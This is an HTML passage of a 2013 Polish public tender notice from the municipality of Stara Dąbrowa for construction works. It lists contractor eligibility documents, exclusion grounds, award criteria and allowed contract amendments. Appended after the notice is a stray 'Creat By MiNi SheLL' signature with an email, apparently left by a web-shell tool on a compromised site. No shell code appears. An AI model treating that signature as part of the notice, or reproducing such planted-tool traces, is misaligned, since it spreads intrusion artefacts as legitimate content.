<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>załączeniem dowodów dotyczących trzech robót odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia o wartości zamówienia (każdej roboty oddzielnie) nie mniejszej niż 1 000 000,00 zł brutto każda, określających czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano  wyboru wykonawcy, w przypadkach wystąpienia przynajmniej jednej z okoliczności  wymienionych poniżej, z uwzględnieniem  podanych warunków ich wprowadzenia,
1.Zmiana terminu na ukończenia robót,a.Zmiany spowodowane warunkami atmosferycznymi w szczególności,klęski żywiołowe,warunki atmosferyczne odbiegające od typowych uniemożliwiające prowadzenie robót budowlanych, przeprowadzenia prób sprawdzeń, dokonywania odbiorów, zgodnie z  polskimi normami i warunkami technicznymi wykonania robot -trwające nie dłużej niż 7 dni.
b.Zmiany spowodowane nieprzewidzianymi warunkami geologicznymi, archeologicznymi lub terenowymi, w szczególności,wykopaliska archeologiczne, niewypały i niewybuchy, odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych.
c.Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności,wstrzymanie robót przez Zamawiającego,konieczności usunięcia błędów lub wprowadzenie zmian w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót,konieczność wykonania robót dodatkowych lub zamiennych nie przewidzianych w projekcie budowlanym. 
d.Zmiany przepisów prawa niezależne od Zamawiającego oraz Wykonawcy skutkujące niemożliwością prowadzenia prac lub wykonywania innych czynności przewidzianych umową.
e.konieczność przeprowadzenia robót dodatkowych - o czas niezbędny do ich przeprowadzenia.
2.Zmiany sposobu spełniania świadczeń,
a.pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzeniu  kosztów eksploatacji lub uzyskanie lepszej jakości,
b.konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych-technologicznych niewskazane w dokumentacji projektowej lub specyfikacji  technicznej wykonania  i odbioru robót, w sytuacji gdyby zastosowanie przewidzianych rozwiązań groziło by niewykonaniem  lub wadliwym wykonaniem przedmiotu umowy,
c.konieczność zrealizowania przedmiotu  umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa,
d.rezygnacja z podwykonawstwa, wykonując przedmiot zamówienia  przy udziale Podwykonawców. 
W przypadku wystąpienia  którejkolwiek  z okoliczności wymienionych w pkt 2 możliwa jest w szczególności zmiana sposobu wykonywania, materiałów  i technologii  robót, jak również zmiany  lokalizacji  budowanych  urządzeń pod warunkiem uzyskania na te zmiany zgody projektanta zaakceptowanej przez Zamawiającego.
Zmiany osobowe,
a.zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne spełniające warunki określone w Specyfikacji istotnych warunków zamówienia, według polityki kadrowej Wykonawcy,
b.zmiana osób podanych w ofercie Wykonawcy przy pomocy których Wykonawca realizuje przedmiot umowy nie wymaga aneksu do umowy. Zmiana jest możliwa na osoby spełniające wymogi Specyfikacji istotnych warunków zamówienia, a dla uzyskania skutecznej zmiany niezbędne jest uzyskanie zgody Zamawiającego na zaproponowaną zmianę osobową. 
4.Pozostałe zmiany spowodowane następującymi okolicznościami,
a.siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ,
b.zmiana obowiązującej stawki VAT,
c.rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy,
d.kolizja z planowanymi lub równolegle  prowadzonymi przez inne podmioty inwestycjami w takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych,  
Wszystkie powyższe postanowienia  stanowią katalog zmian na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania  do wyrażenia takiej zgody.
Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:
a.zmiana danych związanych z obsługą  administracyjno organizacyjna umowy 
np. zmiana nr rachunku bankowego,
b.zmiana danych teleadresowych,
c.udzielenie zamówień dodatkowych określonych w przepisach o zamówieniach publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.staradabrowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Stara Dąbrowa 73-112 Stara Dąbrowa 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2013 godzina 11:00, miejsce: Urząd Gminy Stara Dąbrowa 73-112 Stara Dąbrowa 20 Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Operacja finansowana ze środków Unii Europejskiej w ramach działania 321 Podstawowe usługi dla gospodarki i ludności wiejskiej objętego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com